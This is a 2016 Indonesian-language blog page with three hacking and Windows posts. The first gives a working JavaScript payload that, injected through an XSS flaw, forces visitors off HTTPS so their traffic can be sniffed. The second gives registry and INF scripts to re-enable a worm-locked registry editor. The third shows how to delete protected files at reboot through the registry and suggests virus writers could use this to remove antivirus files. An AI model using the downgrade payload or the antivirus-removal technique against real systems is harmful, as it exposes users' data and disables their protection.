Sunday, January 3, 2016

Protocol Redirect: Playing With Secure Sockets Layer (SSL)


Secure Sockets Layer (SSL) merupakan salah satu metode enkripsi yang telah banyak dipercaya sebagai solusi keamanan komunikasi. Paket data yang mengunakan SSL akan dienkripsi sehingga walaupun nantinya tertangkap oleh Network Sniffer, maka orang lain akan sulit untuk membaca informasi sensitif didalamnya.
Dalam berselancar, biasanya kita menggunakan protokol http:// Namun apabila komunikasi yang terjalin menggunakan SSL, protokol yang digunakan adalah https://. Biasanya ada peringatan dari browser apabila kita akan menggunakan SSL dalam berkomunikasi.
Mari kita lihat dengan menggunakan WIRESHARK mengapa dalam komunikasi sensitif banyak orang mengklaim bahwa SSL adalah pilihan tepat dan cukup secure untuk menjaga informasi sensitif yang sedang terjalin:
{image: wireshark}
Wireshark
Saya melakukan scanning, kemudian mengakses http://spyrozone.net, Berikut yang saya dapatkan dari “Follow TCP Stream” :
{image: spyrozone.net melalui protokol http}
spyrozone.net melalui protokol http
Hmm.. sniffable.. ^_^ Halaman yang saya akses bisa disusun ulang dengan mudahnya. Namun ketika saya mengakses https://spyrozone.net
{image: spyrozone.net melalui protokol https}
spyrozone.net melalui protokol https
Hmm.. sudah jelas khan kenapa dikatakan Secure ^_* Informasi yang ditangkap sulit untuk dibaca ^_^
Namun.. hanya dengan beberapa potong code JavaScript, anda dapat membuat SSL tidak berguna pada situs yang vuln terhadap Cross Site Scripting (XSS). Anda dapat melakukan redirect protokol untuk melempar user dari jalur SSL ke jalur normal dengan menginjeksikan script sederhana pada situs yang vuln terhadap XSS tersebut.. ^_^
And.. Here is the code:
Object.prototype.protocol_redirect = function(uri) {
    if(uri) {
        if(uri.indexOf('https:') !=-1) {
            u = uri;
            n = u.split(':');
            n[0] = n[0].replace('s','');
            document.location = n[0] + '://' +n[1];
        }
    } else {
        u = document.location.href;
        if(document.location.protocol == 'https:') {
            n = u.split(':');
            n[0] = n[0].replace('s','');
            document.location = n[0] + '://' +n[1];
        }
    }
};
this.protocol_redirect();
Hmm.. saya rasa ini juga merupakan salah satu alasan yang kuat kenapa begitu banyak Attacker selalu mengatakan bahwa XSS cukup mengerikan di tangan yang tepat, dan mengapa mereka selalu tertawa ketika masih ada orang yang meremehkan XSS ^_^
Keep learning and Happy hacking.. ^_*

//E.O.F
Posted by at No comments:
Labels: ,

Unlock Registry yang Terkunci

Akhir-akhir ini worm semakin merajalela. Dan sebagian besar dari worm-worm tersebut menggunakan “aksi klasik” dengan mendisable Registry editor untuk memproteksi dirinya-sendiri. Hehehe… Ga’ salah sich.. pasalnya Registry editor adalah bagian terpenting yang kita butuhkan untuk melakukan manipulasi pada komputer kita. Dalam pembasmian worm-pun kita butuh masuk ke registry editor kecuali kita hafal lokasi-lokasi key yang diserang – dalam hal ini kita bisa pakai script VB atau  membuat file *.reg

Cara Pertama

Adakalanya untuk men-unlock registry yang terkunci, kita membuat file *.reg dengan script berikut:
1REGEDIT4
2[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
3"DisableRegistryTools"=dword:00000000
Simpan dengan nama terserah.reg dan jalankan.. maka registry editor anda akan ter un-lock. Namun pada beberapa kasus, regsitry editor tetap terkunci. Ada beberapa kemungkinan:
  • Ada file *.reg lain yang berisi file script serupa di direktory lain, dan dalam script “lain” tersebut value DisableRegistryTools = 1 Hal ini kerap kali terjadi pada WIN-ME
  • Ada aplikasi lain yang sedang memproteksi komputer yang sedang anda hadapi yang mendisable penggunaan file-file dengan ekstensi *.reg —> kerap kali dijumpai di warnet-warnet.
Jika memang demikian, ada alternatif lain yang bisa anda lakukan. Coba script berikut:

Cara Kedua

01[Version]
02Signature="$Chicago$"
03Provider=Symantec
04 
05[DefaultInstall]
06AddReg=UnhookRegKey
07 
08[UnhookRegKey]
09HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
10HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
11HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
12HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
13HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
14HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
15HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools,0x00000020,0
Simpan dengan nama terserah anda.inf Setelah terbentuk file *.inf, klik kanan pada file tersebut dan pilih [instal]. Sekarang coba buka registry anda dan tara… regedit yang manis pun terbuka dengan sepenuh hati. :)

//E.O.F
Posted by at No comments:
Labels: ,

Menghapus File Terproteksi Melalui Registry


Di artikel terdahulu, saya telah membahas mengenai cara mengahapus file terproteksi dengan menggunakan File Detonator V1.0.0. Aplikasi itu akan memerintahkan windows untuk menghapus file yang ditargetkan ketika windows restart.
Nah, kali ini saya akan mengajak Anda untuk melakukan hal yang sama, namun tanpa menggunakan bantuan software pihak ketiga. Dengan mengetahui konsepnya, maka Anda dapat mengimplementasikan teknik ini dalam project anda. Atau.. bagi Anda yang seorang penulis Virus, mungkin bisa Anda terapkan teknik ini dalam Virus anda untuk menghapus komponen-komponen AntiVirus yang memiliki nama default agar AntiVirus tidak dapat berjalan atau ‘musnah’ tanpa jejak (hehehe… mendingan jangan dech..) *_* Sebagai catatan, teknik ini berjalan baik pada OS Windows XP.
Okay, langsung aja yach kita menuju ke langkah-langkah…

[Langkah 1]

Buka Text Editor kesayangan anda. Misalnya NOTEPAD.

[Langkah 2]

Ketik script Registry berikut:
REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations"=hex(7):5c,3f,3f,5c,LOKASI FILE ANDA,00,00,00
Lokasi file Anda harus dikonversikan kedalam heksa terlebih dahulu. Berikut adalah tabel konversinya:
A  =Tukar dengan>  41      a  =Tukar dengan>  61
B  =Tukar dengan>  42      b  =Tukar dengan>  62
C  =Tukar dengan>  43      c  =Tukar dengan>  63
D  =Tukar dengan>  44      d  =Tukar dengan>  64
E  =Tukar dengan>  45      e  =Tukar dengan>  65
F  =Tukar dengan>  46      f  =Tukar dengan>  66
G  =Tukar dengan>  47      g  =Tukar dengan>  67
H  =Tukar dengan>  48      h  =Tukar dengan>  68
I  =Tukar dengan>  49      i  =Tukar dengan>  69
J  =Tukar dengan>  4a      j  =Tukar dengan>  6a
K  =Tukar dengan>  4b      k  =Tukar dengan>  6b
L  =Tukar dengan>  4c      l  =Tukar dengan>  6c
M  =Tukar dengan>  4d      m  =Tukar dengan>  6d
N  =Tukar dengan>  4e      n  =Tukar dengan>  6e
O  =Tukar dengan>  4f      o  =Tukar dengan>  6f
P  =Tukar dengan>  50      p  =Tukar dengan>  70
Q  =Tukar dengan>  51      q  =Tukar dengan>  71
R  =Tukar dengan>  52      r  =Tukar dengan>  72
S  =Tukar dengan>  53      s  =Tukar dengan>  73
T  =Tukar dengan>  54      t  =Tukar dengan>  74
U  =Tukar dengan>  55      u  =Tukar dengan>  75
V  =Tukar dengan>  56      v  =Tukar dengan>  76
W  =Tukar dengan>  57      w  =Tukar dengan>  77
X  =Tukar dengan>  58      x  =Tukar dengan>  78
Y  =Tukar dengan>  59      y  =Tukar dengan>  79
Z  =Tukar dengan>  5a      z  =Tukar dengan>  7a

0  =Tukar dengan>  30      ~  =Tukar dengan>  7e
1  =Tukar dengan>  31      `  =Tukar dengan>  60
2  =Tukar dengan>  32      !  =Tukar dengan>  21
3  =Tukar dengan>  33      @  =Tukar dengan>  40
4  =Tukar dengan>  34      #  =Tukar dengan>  23
5  =Tukar dengan>  35      %  =Tukar dengan>  25
6  =Tukar dengan>  36      $  =Tukar dengan>  24
7  =Tukar dengan>  37      ^  =Tukar dengan>  5e
8  =Tukar dengan>  38      &  =Tukar dengan>  26
9  =Tukar dengan>  39      (  =Tukar dengan>  28
                           )  =Tukar dengan>  29
                           _  =Tukar dengan>  5f
                           -  =Tukar dengan>  2d
                           +  =Tukar dengan>  2b
                           =  =Tukar dengan>  3d
                           {  =Tukar dengan>  7b
                           }  =Tukar dengan>  7d
                           [  =Tukar dengan>  5b
                           ]  =Tukar dengan>  5d
                           ;  =Tukar dengan>  3b
                           '  =Tukar dengan>  27
                           ,  =Tukar dengan>  2c
                           .  =Tukar dengan>  2e
                           \  =Tukar dengan>  5c
                           :  =Tukar dengan>  3a
Pisah masing-masing nilai hasil konversi dengan tanda koma (,). Jadi misalnya Anda ingin menghapus file terproteksi yang berada di lokasi:
D:\spyroZONE\virus.exe
Maka Anda harus menuliskannya pada script anda sebagai berikut (Value datanya jangan dipisah dengan spasi):
REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations"=hex(7):5c,3f,3f,5c,44,3a,5c,73,70,79,72,
                              6f,5a,4f,4e,45, 5c,76,69,72,75,73,2e,65,
                              78,65,00,00,00
Ingat!!! value datanya jangan dipisah dengan spasi tuliskan semuanya dalam 1 baris. Perhatikan, berikut ini adalah lokasi file tadi:
44 3a 5c 73 70 79 72 6f 5a 4f 4e 45 5c 76 69 72 75 73 2e 65 78 65
D  :  \  s  p  y  r  o  Z  O  N  E  \  v  i  r  u  s  .  e  x  e
Jangan lupa, di akhir alamat file tambahkan 3 buah double 0 :
 ,00,00,00

[Langkah 3]

Simpan dengan nama terserah.reg (Klik File -> Save. Pada kolom isian File name, isikan terserah.reg dan pilih All Files pada box pilihan Save As type. Klik Save sesudahnya.). Setelah itu, lalu klik ganda pada file terserah.reg tersebut. Pilih [YES] lalu [OK].
Kini restartlah komputer anda. Setelah itu lihatlah file yang Anda targetkan. Jika langkah-langkah diatas Anda ikuti dengan benar, maka file terproteksi yang ditargetkan  tadi kini tentunya telah terhapus ;)
Bagaimana jika ingin menghapus lebih dari satu file??
Sambungkan saja pada value datanya dengan format yang sama. Pisahkan dengan: 00,00
Misalnya file yang ingin Anda hapus berada di lokasi:
D:\spyroZONE\virus.exe
dan
D:\spyroZONE\viruses.exe
Maka Anda cukup menuliskannya demikian:
REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations"=hex(7):5c,3f,3f,5c,44,3a,5c,73,70,79,72,6f,5a,4f,4e,
                              45,5c,76,69,72,75,73,2e,65,78,65,00,00,5c,3f,3f,5c,
                              44,3a,5c,73,70,79,72,6f,5a,4f,4e,45, 5c,76,69,72,75,
                              73,65,73,2e,65,78,65,00,00,00
Ingat!!! value datanya jangan dipisah dengan spasi tuliskan semuanya dalam 1 baris.
Sekian, sampai jumpa di artikel berikutnya ^_^

//E.O.F
Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)